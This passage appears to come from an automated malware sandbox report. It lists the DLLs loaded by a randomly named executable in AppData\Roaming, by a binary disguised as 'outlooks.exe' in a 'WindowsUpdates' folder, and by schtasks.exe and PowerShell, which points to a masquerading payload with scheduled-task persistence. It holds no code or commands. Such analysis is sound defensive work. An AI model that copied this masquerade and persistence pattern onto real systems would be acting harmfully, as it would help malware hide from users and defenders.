Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: iconcodecservice.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cryptnet.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: webio.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cabinet.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: ucrtbase_clr0400.dll
